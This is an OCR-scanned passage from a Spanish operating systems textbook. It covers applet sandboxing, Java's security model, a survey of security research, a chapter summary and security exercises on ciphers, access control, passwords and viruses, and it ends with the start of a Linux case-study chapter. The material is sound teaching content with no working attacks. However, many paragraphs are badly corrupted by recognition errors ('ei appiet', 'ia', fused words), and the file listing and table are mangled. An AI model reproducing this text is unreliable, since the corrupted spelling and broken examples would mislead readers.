compara con ei prefijo correcto que se cargó en un principio en S 2 . Si no coinciden, se produce una 
trampa y se eiimina ei appiet. Esta secuencia de código requiere cuatro instrucciones y dos regis¬ 
tros reutiiizabies. 

Para reparar ei programa binario durante ia ejecución se requiere cierto trabajo, pero se puede 
iievar a cabo. Sería más simpie si ei appiet se presentara en formato de código fuente y después se 
compiiara en forma iocai, mediante ei uso de un compiiador confiabie que comprobara de manera 
automática i as direcciones estáticas e insertara código para verificar i as dinámicas durante i a ejecución. 
De cuaiquier forma, hay cierta sobrecarga en tiempo de ejecución asociada con ias comprobaciones di¬ 
námicas. Wahbey sus coiaboradores (1993) reai izaron mediciones sobre eiio y obtuvieron como resui- 
tado un 4%, io cuai es generaimente aceptabie. 

Un segundo probiema que se debe resoiver es io que ocurre cuando un appiet trata de reaiizar 
una iiamada ai sistema. La soiución aquí es simpie. La instrucción de iiamada ai sistema se reem- 
piaza mediante una iiamada a un móduio especiai iiamado monitor de referencias en ia misma pa¬ 
sada en ia que se insertan ias comprobaciones de ias direcciones dinámicas (o, si ei código fuente 
está disponibie, se vincuia con una bibiioteca especiai que iiama ai monitor de referencias en vez 
de reaiizar iiamadas ai sistema). De cuaiquier forma, ei monitor de referencias examina cada inten¬ 
to de iiamada y decide si es seguro de reaiizar o no. Si ia iiamada se considera aceptabie, como es¬ 
cribir un archivo temporai en un directorio reutiiizabie designado, se permite que ia iiamada 
continúe. Si se sabe que ia iiamada es peiigrosa o ei monitor de referencias no puede saberio, se eii¬ 
mina ei appiet. Si ei monitor de referencias puede saber qué appiet hizo ia iiamada, un soio moni¬ 
tor de referencias en aiguna parte de ia memoria puede manejar ias peticiones de todos ios appiets. 
Por io generai, ei monitor de referencias conoce ios permisos mediante un archivo de configuración. 

I nterpretación 

La segunda forma de ejecutar appiets que no son confiabies es ejecutados de manera interpretativa 
y no permitir que obtengan ei controi dei hardware. Éste es ei método utiiizado por ios navegado¬ 
res Web. Los appiets de páginas Web se escriben comúnmente en java, ei cuai es un ienguaje de 
programación normai, o en un ienguaje de secuencias de comandos de aito nivei como TCL segu¬ 
ro o JavaScript. Los appiets de java se compiian primero en un ienguaje máquina orientado a una 
piia virtuai, conocido como J VM (j ava Virtuai M achine, M áquina virtuai de j ava). Son estos ap¬ 
piets dejVM los que se coiocan en la páginaWeb.AI descargarlos, seinsertan en un intérprete de 
lajVM dentro del navegador, como se ilustra en la figura 9-38. 

La ventaja de echar a andar código interpretado en vez de código compilado (ejecutado) es que 
el intérprete examina cada instrucción antes de ejecutarla. Esto da al intérprete la oportunidad de 
comprobar si la dirección es válida. Además, también se atrapan e interpretan las llamadas al siste¬ 
ma. La forma en que se manejan estas llamadas depende de la directiva de seguridad. Por ejemplo, 
si un appiet es confiable (es decir, si proviene del disco local), se pueden llevar a cabo sus llama¬ 
das al sistema sin cuestionamiento. No obstante, si un appiet no es confiable (es decir, si llegó de 
Internet), se podría colocar en una caja de arena para restringir su comportamiento. 


SECCION 9.8 


DEFENSAS 


709 


Espacio de direcciones virtuales 



Los lenguajes de secuencias de comandos de alto nivel también se pueden interpretar. Aquí no 
se utilizan direcciones de máquinas, por lo que no hay peligro de que una secuencia de comandos 
trate de acceder a la memoria de una manera no permitida. La desventaja déla interpretación en ge¬ 
neral es su gran lentitud en comparación con la ejecución de código nativo compilado. 


9.8.7 Seguridad de J ava 

El lenguaje de programación java y el sistema en tiempo de ejecución que lo acompaña se diseña¬ 
ron para permitir escribir un programa y compilarlo una vez, para después enviarlo a través de In¬ 
ternet en formato binario y ejecutarlo en cualquier máquina con soporte para java. La seguridad era 
parte del diseño de java desde un principio. En esta sección analizaremos su funcionamiento. 

j ava es un lenguaje con seguridad de tipos, lo cual significa que el compilador rechazará cual¬ 
quier intento por utilizar una variable de una forma que no sea compatible con su tipo. Por el con¬ 
trario, considere el siguiente código en C: 


func_atrevida() 

{ 

char *p; 

P = rand(); 

*P = 0; 

} 

Este código genera un número aleatorio y lo almacena en el apuntador p. Después almacena un 
byte 0 en la dirección que contiene p, sobrescribiendo lo que contenga, ya sea código o datos. En 
java, las construcciones que mezclan los tipos como éstos son prohibidos por la gramática. Ade¬ 
más, java no tiene variables apuntadores, conversiones, asignación de almacenamiento controlada 
por el usuario (como malloc y free) y todas las referencias a los arreglos se comprueban en tiempo 
de ejecución. 
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En Java los programas se compilan en un código intermedio binario conocido como código by- 
tedej VM . La jVM tiene aproximadamente 100 instrucciones, la mayoría de las cuales meten ob¬ 
jetos de un tipo específico en la pila, los sacan de ella o combinan dos elementos en la pila mediante 
operaciones aritméticas. Por lo general estos programas de la JVM se interpretan, aunque en algunos 
casos se pueden compilaren lenguaje máquina para agilizar su ejecución. En el modelo de java, los 
applets que se envían por Internet para ejecutarlos en forma remota son programas de la JVM . 

Cuando llega un applet, pasa por un verificador de código byte de JVM que comprueba si el 
applet obedece ciertas reglas. U n applet compilado en forma apropiada las obedecerá de manera au¬ 
tomática, pero no hay nada que evite que un usuario malicioso escriba un applet de JVM en lengua¬ 
je ensamblador dejVM . Las comprobaciones son: 

1. ¿El applet intenta falsificar los apuntadores? 

2. ¿Viola las restricciones de acceso en los miembros de clases privadas? 

3. ¿Trata de utilizar una variable de cierto tipo como si fuera de otro tipo? 

4. ¿Genera desbordamientos o subdesbordamientos de pila? 

5. ¿Convierte de manera ilegal las variables de un tipo en otro? 

Si el applet pasa todas estas pruebas, se puede ejecutar de manera segura sin temor de que acceda 
a la memoria que no sea suya. 

Sin embargo, los applets pueden aún realizar llamadas al sistema mediante llamadas a métodos 
(procedimientos) de java que se proporcionan para ese fin. La forma en que java maneja este pro¬ 
ceso ha evolucionado con el tiempo. En la primera versión dejava, el j DK (j ava Development Kit, 
Kit de desarrollo de java) 1.0, los applets se dividían en dos clases: confiables y no confiables. Los 
applets que se obtenían del disco duro eran confiables y podían realizar todas las llamadas al siste¬ 
ma que quisieran. Por el contrario, los applets que se obtenían por Internet eran no confiables. Se 
ejecutaban en una caja de arena, como se muestra en la figura 9-38, y casi no podían hacer nada. 

Después de obtener cierta experiencia con este modelo, Sun decidió que era demasiado restricti¬ 
vo. En el jDK 1.1 se utilizó la firma de código. Cuando llegaba un applet por Internet, se realizaba una 
comprobación para ver si era firmado por una persona u organización confiable para el usuario (según 
lo definido en la lista de firmadores confiables del usuario). De ser así, se permitía al applet hacer lo 
que quisiera. En caso contrario, se ejecutaba en una caja de arena y se restringía severamente. 

Después de obtener más experiencia, este proceso también fue insatisfactorio, por lo cual se 
modificó otra vez el modelo de seguridad. El J DK 1.2 introdujo una directiva de seguridad detalla¬ 
da y restrictiva que se aplicaba a todos los applets, tanto locales como remotos. El modelo de segu¬ 
ridad era tan complicado que se escribió un libro completo para describirlo (Gong, 1999), por lo 
que aquí sólo sintetizaremos algunos de los puntos importantes. 

Cada applet se caracteriza por dos cosas: de dónde viene y quién lo firmó. Su URL determina 
el lugar de donde viene; para determinar quién lo firmó se utiliza una clave privada para la firma. 
Cada usuario puede crear una directiva de seguridad que consiste en una lista de reglas. Cada regla 
puede listar un URL, un firmante, un objeto y una acción que el applet puede realizar con el obje- 
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to, si su URL y su firmante coinciden con ia regia. En ia tabia de ia figura 9-39 se muestra ia infor¬ 
mación proporcionada en forma conceptuai, aunque ei formato reai es distinto y está reiacionado 
con ia jerarquía de ciases de java. 


URL 

Firmante 

Objeto 

Acción 

www.taxprep.com 

TaxPrep 

/usr/susan/1040.xis 

Leer 

* 


/usr/tmp/* 

Leer, Escribir 

www.microsoft.com 

Microsoft 

/usr/susan/Office/— 

Leer, Escribir, Eiiminar 


Figura 9-39. Algunos ejemplos de protección que se pueden especificar mediante el 
JDK 1.2. 


Hay un tipo de acción que permite ei acceso a un archivo. La acción puede especificar un archi¬ 
vo o directorio, ei conjunto de todos ios archivos en un directorio dado o ei conjunto de todos ios ar¬ 
chivos y directorios contenidos de manera recursiva en un directorio dado. Las tres iíneas de ia figu¬ 
ra 9-39 corresponden a estos tres casos. En ia primera iínea, ia usuaria Susan tiene configurado su 
archivo de permisos de manera que sóio ios appiets que se originen desde ia máquina de ia empresa 
que hace sus deciaraciones fiscaies (iiamada www.taxprep.com) y que estén firmados por ia misma 
tengan acceso de iectura a sus datos fiscaies, ios cuaies se encuentran en ei archivo 1040.xis. Éste es 
ei único archivo que pueden ieer, y ningún otro appiet puede ieer este archivo. Además, todos ios ap¬ 
piets de todos ios orígenes, estén firmados o no, pueden ieer y escribir archivos en /usr/tmp. 

Además, Susan confía io suficiente en M icrosoftcomo para permitir que ios appiets que se ori¬ 
ginen de su sitio y estén firmados por esta empresa tengan permiso de ieer, escribir y eiiminar to¬ 
dos ios archivos dentro dei directorio Office en ei árboi de directorios: por ejempio, para corregir 
errores e instaiar nuevas versiones dei software. Para verificar ias firmas, Susan debe tener ias cia- 
ves púbiicas necesarias en su disco, o debe adquiridas en forma dinámica: por ejempio, en ia for¬ 
ma de un certificado firmado por una empresa en ia que eiia confía y cuya ciave púbiica posee. 

Los archivos no son ios únicos recursos que se pueden proteger. También se puede proteger ei 
acceso a ia red. Los objetos aquí son puertos específicos en computadoras específicas. Una compu¬ 
tadora se especifica mediante una dirección IP o un nombre DNS: ios puertos en esa máquina se es¬ 
pecifican mediante un rango de números. Las acciones posibies inciuyen ei soiicitar ia conexión a 
ia computadora remota y aceptar ias conexiones originadas por ia computadora remota. De esta for¬ 
ma, un appiet puede recibir acceso a ia red, pero está restringido para comunicarse sóio con ias 
computadoras que aparezcan de manera expiícita en ia iista de permisos. Los appiets pueden cargar 
en forma dinámica código adicionai (ciases) según io requieran, pero ios cargadores de ciases su¬ 
ministrados por ei usuario pueden controiar con precisión desde qué máquinas se pueden originar 
esas ciases. También hay muchas otras características de seguridad presentes. 

9.9 INVESTIGACIÓN SOBRE LA SEGURIDAD 

La seguridad de computadoras es un tema muy activo, y se está iievando a cabo una gran cantidad 
de investigación. La computación confiabie es un tema importante, en especiai ias piataformas 
(Erickson, 2003: Garfinkei y coiaboradores, 2003: Reid y Caeiii, 2005: y Thibadeau, 2006) y ias di- 
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rectivas públicas asociadas (A nderson, 2003). Otro tema de investigación continua es el de los mo¬ 
delos y la implementación del flujo de información (Castro y colaboradores, 2006; Efstathopoulos 
y colaboradores, 2005; Hicksy colaboradores, 2007; Zeldovich y colaboradores, 2006). 

La autenticación de los usuarios (incluyendo la biométrica) sigue siendo un tema importante 
(Bhargav-Spantzel y colaboradores, 2006; Bergadano y colaboradores, 2002; Pusara y Brodley, 
2004; Sasse, 2007; Yoon y colaboradores, 2004). 

Dados todos los problemas con el malware en estos días, hay mucha investigación sobre los 
desbordamientos de búfer y otras explotaciones, además de la forma de lidiar con ellos (Hackett y 
colaboradores, 2006; jones, 2007; Kuperman y colaboradores, 2005; Ley Soffa, 2007; Prasad 
y Chiueh, 2003). 

El malware en todas sus formas se estudia con detalle, incluyendo los caballos de Troya (Agra- 
wal y colaboradores, 2007; Franz, 2007; Moffiey colaboradores, 2006), los virus (Bruschi y cola¬ 
boradores, 2007; Cheng y colaboradores, 2007; Rieback y colaboradores, 2006), los gusanos 
(Abdelhafez y colaboradores, 2007; j iang y X u, 2006; Kienzie y Eider, 2003; Tang y Chen, 2007), 
el spyware (Egeley colaboradores, 2007; Felten y Flalderman, 2006; Wu y colaboradores, 2006), y 
los rootkits (Kruegel y colaboradores, 2004; Leviney colaboradores, 2006; Quynh y Takefuji, 2007; 
Wangy Dasgupta, 2007). Como los virus, el spyware y los rootkits tratan de ocultarse, se han reali¬ 
zado trabajos sobre la tecnología furtiva y la manera en que se pueden detectar de todas formas (Car- 
penter y colaboradores, 2007; Garfinkel y colaboradores, 2007; Lyda y Flamrock, 2007). También se 
ha examinado la esteganografía (Flarmsen y Peariman, 2005; Kratzery colaboradores, 2006). 

Sin necesidad de decirlo, se ha realizado mucho trabajo sobre la defensa de los sistemas con¬ 
tra el malware. Parte de ello se enfoca en el software anti vi rus (Flenchiri y japkowicz, 2006; Sanok, 
2005; Stieglery colaboradores, 2006; Uluski y colaboradores, 2005). Los sistemas de detección de 
intrusos son un tema especialmente activo, en donde se realiza trabajo sobre los intrusos en tiempo 
real y los intrusos históricos (K ing y Chen, 2005; 2006; Saidi, 2007; Wang y colaboradores, 2006b; 
Wheeler y Fulp, 2007). Sin duda los tarros de miel son un aspecto importante de los IDS y reciben 
una buena cantidad de atención por sí solos (Anagnostakisy colaboradores, 2005; Asrigo y colabo¬ 
radores, 2006; Portokalidis y colaboradores, 2006). 


9.10 RESUMEN 

Con frecuencia, las computadoras contienen datos valiosos y confidenciales, incluyendo declaracio¬ 
nes fiscales, números de tarjetas de crédito, planes de negocios, secretos comerciales y mucho más. 
Por lo general, los propietarios de estas computadoras se preocupan mucho porque sean privadas y 
nadie pueda alterarlas, motivos por los que se requiere un sistema operativo que proporcione bue¬ 
na seguridad. Una manera de mantener la información secreta es cifrarla y administrar las claves 
con cuidado. Algunas veces es necesario demostrar la autenticidad de la información digital, en cu¬ 
yo caso se pueden utilizar hashes criptográficos, firmas digitales y certificados firmados por una au¬ 
toridad de certificación confiable. 

Los derechos de acceso a la información se pueden modelar como una gran matriz, en donde 
las filas son los dominios (usuarios) y las columnas los objetos (por ejemplo, archivos). Cada cel¬ 
da especifica los derechos de acceso del dominio para con el objeto. Como la matriz es escasa, se 
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puede almacenar por fila, lo cual se convierte en una lista de capacidades que indica lo que cada do¬ 
minio puede hacer; o también se puede almacenar por columna, en cuyo caso se convierte en una 
lista de control de acceso que indica quién puede acceder al objeto y en qué forma. M edianteel uso 
de técnicas de modelado formales, se puede modelar y limitar el flujo de la información en un sis¬ 
tema. Sin embargo, algunas veces puede haber fugas mediante el uso de canales encubiertos, como 
la modulación del uso de la CPU. 

En cualquier sistema seguro, los usuarios se deben autenticar. Para ello se puede utilizar algo 
que el usuario conozca, algo que el usuario tenga o algo que el usuario sea (biométrica). Se puede 
utilizar la identificación de dos factores, como la exploración del iris y una contraseña, para mejo¬ 
rar la seguridad. 

Los internos (como los empleados de una empresa) pueden vencer la seguridad del sistema en 
una variedad de formas. Entre ellas se incluyen las bombas lógicas que se activan en cierta fecha 
futura, las puertas de trampa para permitir al interno un acceso no autorizado en un momento pos¬ 
terior, y la suplantación de nombres de inicio de sesión. 

Se pueden explotar muchos tipos de errores en el código para tomar el control de los progra¬ 
mas y sistemas. Estos errores incluyen desbordamientos de búfer, ataques mediante cadenas de for¬ 
mato, ataques de retorno a libe, ataques por desbordamiento de enteros, ataques por inyección de 
código y ataques por escalada de privilegios. 

Internet está llena de malware, incluyendo caballos deTroya (conocidos también como troya- 
nos), virus, gusanos, spyware y rootkits. Cada uno de estos tipos de malware son una amenaza a la 
confidencialidad de los datos y su integridad. O peor aún, un ataque de malware tiene la capacidad 
de tomar el control de una máquina y convertirla en un zombie que envíe spam o se utilice para lan¬ 
zar otros ataques. 

Por fortuna, hay varias formas en las que los sistemas se pueden defender por su cuenta. La me¬ 
jor estrategia es la defensa en profundidad, mediante el uso de varias técnicas. A Igunas de ellas in¬ 
cluyen f i rewails, exploradores de virus, firma de código, encarcelamiento, sistemas de detección de 
intrusos y encapsulamiento de código móvil. 

PROBLEMAS 

1. Quebrante el siguiente cifrado monoalfabético. El texto simple, que consiste sólo de letras, es un ex¬ 
tracto conocido de un poema por Lewis Caroll en idioma inglés. 

kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthcm 
ur mfudm zhx mftnm zhx mdzythc pzq ur ezsszcdm zhx gthcm 
zhx pfa kfd mdz tm sutythc fuk zhx pfdkfdi ntcm fzld pthcm 
sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk 
rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk 
hu folia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk 

2. Considere un cifrado de clave secreta que tiene una matriz de 26 x 26, donde el encabezado de las 
columnas es ABC ... Z y el de las filas también es ABC ... Z. El texto simple se cifra dos caracteres 
a la vez. El primer carácter es la columna: el segundo es la fila. La celda formada por la intersec¬ 
ción de la fila y la columna contiene dos caracteres de texto cifrado. ¿A qué restricción se debe ad¬ 
herir la matriz y cuántas claves hay? 
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3. La criptografía de clave secreta es más eficiente que ia criptografía de ciave púbiica, pero requiere que 
ei emisor y ei receptor estén de acuerdo sobre una ciave por adeiantado. Suponga que ei emisor y ei 
receptor nunca se han reunido, pero que existe una tercera parte de confianza que comparte una ciave 
secreta con ei emisor y que también comparte una ciave secreta (distinta) con ei receptor. ¿Cómo pue¬ 
den ei emisor y ei receptor estabiecer una nueva ciave secreta compartida bajo estas circunstancias? 

4. Proporcione un ejempio simpie de una función matemática que, en una primera aproximación, se de¬ 
sempeñe como una función de una vía. 

5. Suponga que dos extraños A y B desean comunicarse entre sí mediante ei uso de ia criptografía de 
ciave secreta, pero no comparten una ciave. Suponga que ambos confían en una tercera parte C, cu¬ 
ya ciave púbiica es muy conocida. ¿Cómo pueden ios dos extraños estabiecer una nueva ciave se¬ 
creta compartida bajo estas circunstancias? 

6 . Suponga que un sistema tiene 1000 objetos y 100 dominios en cierto momento. Uno por ciento de 
ios objetos son accesibies (cierta combinación de r, w y x) en todos ios dominios, 10% son accesi- 
bies en dos dominios y 89% restante son accesibies en un dominio. Suponga que se requiere una uni¬ 
dad de espacio paraaimacenar un permiso de acceso (aiguna combinación der, w, x), un ID de objeto 
o un ID de dominio. ¿Cuánto espacio se requiere para almacenar toda la matriz de protección, la ma¬ 
triz de protección como unaACL, y la matriz de protección como una lista de capacidades? 

7. Dos de los distintos mecanismos de protección que hemos analizado son las listas de capacidades y 
las listas de control de acceso. Para cada uno de los siguientes problemas de protección, indique cuál 
de los siguientes mecanismos se puede utilizar. 

(a) Ken desea que todos puedan leer sus archivos, excepto su compañero de oficina. 

(b) M itch y Steve desean compartir algunos archivos secretos. 

(c) Linda desea que algunos de sus archivos sean públicos. 

8 . Represente las propiedades y permisos que se muestran en este listado de directorio de U NIX como 
una matriz de protección. Nota: asw es miembro dedos grupos: users y devel; gmw es miembro só¬ 
lo de users. Trate a cada uno de los dos usuarios y dos grupos como un dominio, de manera que la 
matriz tenga cuatro filas (una por cada dominio) y cuatro columnas (una por cada archivo). 


- rw- r— r— 

2 

gmw 

users 

908 

May 26 16:45 

PPP-Notes 

-rwx r-x r-x 

1 

asw 

devel 

432 

May 13 12:35 

progi 

- rw- rw- 

1 

asw 

users 

50094 

May 30 17:51 

project.t 

- rw- r- 

1 

asw 

devel 

13124 

May 31 14:30 

splash.gif 


9. Exprese los permisos que se muestran en el listado de directorio del problema anterior, como listas 
de control de acceso. 

10. En el esquema deAmoeba para proteger las capacidades, un usuario puede pedir al servidor que pro¬ 
duzca una nueva capacidad con menos permisos, que después puede otorgar a un amigo. ¿Qué ocu¬ 
rre si el amigo pide al servidor que elimine aún más derechos, de manera que lo pueda otorgar a 
alguien más? 

11. En la figura 9-13 no hay flecha del proceso B al objeto 1. ¿Se permitiría dicha flecha? Si no es así, 
¿qué regla violaría? 

12. Si se permitieran mensajes de un proceso a otro en la figura 9-13, ¿qué reglas se aplicarían a ellos? 
Para el proceso B en particular, ¿a cuáles procesos podría enviar mensajes y a cuáles no? 
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13. Considere el sistema esteganográfico de la figura 9-16. Cada píxel se puede representar en un espa¬ 
cio de color mediante un punto en el sistema tridimensional con ejes para los valores R, G y B. Uti¬ 
lice este espacio para explicar lo que ocurre con la resolución de color cuando se emplea la 
esteganografía como en esta figura. 

14. El texto de lenguaje natural en ASCII se puede comprimir como mínimo en 50% mediante el uso de 
varios algoritmos de compresión. Utilice este conocimiento para calcular la capacidad de acarreo es¬ 
teganográfico para el texto ASCII (en bytes) de una imagen de 1600 x 1200, almacenada mediante 
el uso de los bits de orden inferior de cada píxel. ¿Cuánto se incrementa el tamaño de la imagen me¬ 
diante el uso de esta técnica (suponiendo que no hay cifrado ni expansión debido al cifrado)? ¿Cuál 
es la eficiencia del esquema, es decir, su carga útil/(bytes transmitidos)? 

15. Suponga que un grupo muy estrecho de disidentes políticos que vive en un país represivo utiliza la 
esteganografía para enviar al mundo mensajes sobre las condiciones en su país. El gobierno está 
consciente de ello y para combatirlos envía imágenes falsas que contienen mensajes esteganográfi- 
cos falsos. ¿Cómo pueden los disidentes tratar de ayudar a que las personas distingan los mensajes 
reales de los falsos? 

16. Vaya a www.cs.vu.nl/asty haga clic en el vínculo covered writing. Siga las instrucciones para extraer 
las obras. Responda a las siguientes preguntas: 

(a) ¿Cuáles son los tamaños de los archivos de las cebras originales y de las cebras modificadas? 

(b) ¿Qué obras están almacenadas en secreto en el archivo de las cebras? 

(c) ¿Cuántos bytes se almacenan en secreto en el archivo de las cebras? 

17. Es más seguro que la computadora no utilice eco para imprimir la contraseña en vez de que utilice el eco 
para imprimir un asterisco por cada carácter escrito, ya que esta última opción divulga la longitud de la 
contraseña a cualquiera que esté cerca y pueda ver la pantalla. Suponiendo que las contraseñas consis¬ 
ten sólo en letras mayúsculas, minúsculas y dígitos, y que deben tener un mínimo de cinco caracteres y 
un máximo de ocho, ¿cuánta seguridad adicional se obtiene al no mostrar nada? 

18. Después de recibir su título, usted sol icita trabajo como director de un centro computacional de una gran 
universidad, que acaba de cambiar su viejo sistema mainframe por un servidor grande en una LA N que 
ejecuta UNIX. Usted obtiene el empleo. Quince minutos después de empezar a trabajar, su asistente 
irrumpe en su oficina gritando: "A Igunos estudiantes descubrieron el algoritmo que utilizamos pa¬ 
ra cifrar las contraseñas y lo publicaron en Internet". ¿Qué debe hacer usted? 

19. El esquema de protección M orris-Thompson con los números aleatorios de n bits (sait) se diseñó pa¬ 
ra dificultar a un intruso la labor de descubrir un gran número de contraseñas al cifrar cadenas co¬ 
munes por adelantado. ¿El esquema ofrece también protección contra un estudiante que trata de 
adivinar la contraseña del superusuario en su máquina? Suponga que el archivo de contraseñas está 
disponible para leerlo. 

20. Explique la diferencia entre el mecanismo de contraseñas de U NIX y el cifrado. 

21. Suponga que el archivo de contraseñas de un sistema está disponible para un cracker. ¿Cuánto tiem¬ 
po adicional necesita el cracker para descubrir todas las contraseñas si el sistema utiliza el esquema 
de protección M orris-Thompson con un número sait de n bits, y cuánto tiempo necesita cuando el 
sistema no utiliza este esquema? 

22. M endone tres características que debe tener un buen indicador biométrico para que sea útil como 
autenticador de inicio de sesión. 
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23. U n departamento de ciencias computacionaies tiene una extensa coiección de máquinas UNIX en su 
red local. Los usuarios en cualquier máquina pueden emitir un comando de la forma 

rexec maquina4 who 

para que el comando se ejecute en la maquina4, sin que el usuario tenga que iniciar sesión en la 
máquina remota. Para implementar esta característica, el kernel del usuario tiene que enviar el co¬ 
mando y su UID a la máquina remota. ¿Es este esquema es seguro si los kerneis son de confian¬ 
za? ¿Qué pasa si algunas de las máquinas son computadoras personales de los estudiantes, sin 
protección? 

24. ¿Qué propiedad en común tienela implementación de contraseñas en UNIX con el esquema de Lam¬ 
port para iniciar sesión a través de una red insegura? 

25. El esquema de contraseña de un solo uso de Lamport utiliza las contraseñas en orden inverso. ¿No 
sería más simple utilizar f(s) la primera vez, f(f(s)) la segunda vez, y así en lo sucesivo? 

26. ¿Hay alguna manera de utilizar el hardware de la M M U para evitar el tipo de ataque por desborda¬ 
miento que se muestra en la figura 9-24? Explique por qué sí o por qué no. 

27. M endone una característica del compilador de C que pudiera eliminar una gran cantidad de hoyos 
de seguridad. ¿Por qué no se implementa con más amplitud? 

28. ¿Puede funcionar el ataque del caballo de Troya en un sistema protegido por capacidades? 

29. Cuando se elimina un archivo, por lo general sus bloques se regresan a la lista de bloques libres, pe¬ 
ro no se borran. ¿C ree usted que sería conveniente que el sistema operativo borrara cada bloque an¬ 
tes de liberarlo? Considere los factores de seguridad y de rendimiento en su respuesta, y explique el 
efecto de cada uno. 

30. ¿Cómo puede un virus parasítico (a) asegurar que se ejecutará antes que su programa host, y (b) pa¬ 
sar el control de vuelta a su host, después de realizar su trabajo? 

31. A Igunos sistemas operativos requieren que las particiones de disco empiecen al principio de una pis¬ 
ta. ¿Cómo facilita esto el trabajo de un virus en el sector de arranque? 

32. M edifique el programa de la figura 9-27 de manera que encuentre todos los programas de C, en vez 
de todos los archivos ejecutables. 

33. El virus de la figura 9-32(d) está cifrado. ¿Cómo pueden saber los científicos dedicados en el labo¬ 
ratorio antivirus cuál parte del archivo es la clave, para poder descifrar el virus y aplicarle ingenie¬ 
ría inversa? ¿Qué puede hacer Virgilio para dificultar más su trabajo? 

34. El virus de la figura 9-32(c) tiene tanto un compresor como un descompresor. El descompresor 
se necesita para expandir y ejecutar el programa ejecutable comprimido. ¿Para qué sirve el com¬ 
presor? 

35. Nombre una desventaja de un virus de cifrado polimórfico desde el punto de vista del escritor del virus. 

36. A menudo podemos ver las siguientes instrucciones para recuperarse del ataque de un virus: 

1. Iniciar el sistema infectado. 

2. Respaldar todos los archivos en un medio externo. 

3. Ejecutar fdisk para dar formato al disco. 
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4. Reinstalar el sistema operativo desde el CD-ROM original. 

5. Volver a cargar los archivos desde el medio externo. 

M endone dos errores graves en estas instrucciones. 

37. ¿Es posible tener virus de compañía (virus que no modifican los archivos existentes) en U NIX? De 
ser así, ¿cómo? Si no es así, ¿por qué no? 

38. ¿Cuál es la diferencia entre un virus y un gusano? ¿Cómo se reproduce cada uno? 

39. Los archivos auto-extraíbles, que contienen uno o más archivos comprimidos que se empaquetan 
con un programa de extracción, se utilizan con frecuencia para entregar programas o actualizacio¬ 
nes de los mismos. A nalice las implicaciones de seguridad de esta técnica. 

40. Analice la posibilidad de escribir un programa que reciba otro programa como entrada y determine 
si ese programa contiene un virus. 

41. En la sección 9.8.1 se describe un conjunto de reglas defirewail que limitan el acceso exterior a só¬ 
lo tres servicios. Describa otro conjunto de reglas que pueda agregar a este firewail para restringir 
aún más el acceso a estos servicios. 

42. En algunas máquinas, la instrucción shr que se utiliza en la figura 9-37(b) llena los bits no utiliza¬ 
dos con ceros: en otras máquinas, el bit de signo se extiende a la derecha. Para que la figura 9-37(b) 
sea correcta, ¿importa el tipo de instrucción de desplazamiento que se utilice? De ser así, ¿cuál es 
mejor? 

43. Para verificar que un distribuidor de confianza haya firmado un applet, el distribuidor del applet pue¬ 
de incluir un certificado firmado por un tercero de confianza que contenga su clave pública. Sin em¬ 
bargo, para leer el certificado el usuario necesita la clave pública del tercero de confianza. Una 
cuarta parte de confianza podría proveer esta clave, pero entonces el usuario necesitaría la clave pú¬ 
blica de esa parte también. Parece ser que no hay forma de salir del sistema de verificación sin ayu¬ 
da, y aún así los navegadores existentes lo utilizan. ¿Cómo podría funcionar? 

44. Describa tres características que hacen de j ava un mejor lenguaje de programación que C para es¬ 
cribir programas seguros. 

45. Suponga que su sistema utiliza el j DK 1.2. M uestre las reglas (similares a las de la figura 9-39) que 
utilizará para permitir que un applet de www.apletsRus.com se ejecute en su máquina. Este applet 
puede descargar archivos adicionales de www.appletsRus.com, leer/escribir archivos en /usr/tmp/ y 
también leer archivos de/usr/me/appletdir. 

46. Escriba un par de programas en C o como secuencias de comandos del shell, para enviar y recibir 
un mensaje mediante un canal encubierto en un sistema UNIX. Sugerencia: Un bit de permiso se 
puede ver incluso cuando un archivo es por lo demás inaccesible, y se garantiza que el comando o 
llamada al sistema sieep producirá un retraso por un tiempo fijo, establecido en base a su argumen¬ 
to. M ida la velocidad de los datos en un sistema inactivo. Después cree una carga artificial pesada 
al iniciar varios procesos distintos en segundo plano y vuelva a medir la velocidad de los datos. 

47. Varios sistemas UNIX utilizan el algoritmo DES para cifrar contraseñas. Por lo general, estos siste¬ 
mas aplican el DES 25 veces seguidas para obtener la contraseña cifrada. Descargue una implemen- 
tación de DES de Internet y escriba un programa que cifre una contraseña y compruebe si es válida 
para dicho sistema. Genere una lista de 10 contraseñas cifradas, utilizando el esquema de protección 
M orris-Thompson. U se un número sait de 16 bits. 
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48. Suponga que un sistema utiliza ACLs para mantener su matriz de protección. Escriba un conjunto 
defunciones administrativas para administrar lasACLs cuando (1) se cree un objeto: (2) se elimine 
un objeto: (3) se cree un dominio: (4) se elimine un dominio: (5) se otorguen nuevos permisos de 
acceso (una combinación de r, w, x) a un dominio para acceder a un objeto: (6) se revoquen los per¬ 
misos de acceso existentes de un dominio para acceder a un objeto: (7) se otorguen nuevos permi¬ 
sos de acceso a todos los dominios para acceder a un objeto: (8) se revoquen los permisos de acceso 
a un objeto para todos los dominios. 


10 


CASO DE ESTUDIO 1; LINUX 


En capítulos anteriores examinamos muchos principios, abstracciones, algoritmos y técnicas en ge¬ 
neral de los sistemas operativos. Hallegadoel momento de analizar algunos sistemas concretos pa¬ 
ra ver cómo los principios examinados se aplican en el mundo real. Empezaremos con Linux, una 
variante popular de UNIX, que se ejecuta en una amplia variedad de computadoras. Es uno de los 
sistemas operativos dominantes en las estaciones de trabajo y servidores de alto rendimiento, pero 
también se utiliza en sistemas que varían desde teléfonos celulares hasta supercomputadoras. 
Además ilustra muchos principios de diseño importantes en forma apropiada. 

Nuestro análisis empezará con la historia y evolución de UNIX y Linux. Después veremos las 
generalidades sobre Linux, para que el lector sepa cómo se utiliza. Estas generalidades serán de va¬ 
lor especial para los lectores que sólo conozcan Windows, ya que este sistema operativo oculta ca¬ 
si todos los detalles del sistema a sus usuarios. Aunque las interfaces gráficas pueden ser sencillas 
para los principiantes, proporcionan muy poca flexibilidad y ningún detalle acerca del funciona¬ 
miento interno del sistema. 

Después llegaremos al corazón de este capítulo, un análisis de los procesos, la administración 
de memoria, la E/S, el sistema de archivos y la seguridad en Linux. Para cada tema analizaremos pri¬ 
mero los conceptos fundamentales, después las llamadas al sistema y por último la implementación. 

Para empezar debemos plantear la siguiente pregunta: ¿Por qué Linux? Linux es una variante de 
UNIX, pero hay muchas otras versiones y variantes de UNIX, incluyendo AIX, FreeBSD, HP-UX, 
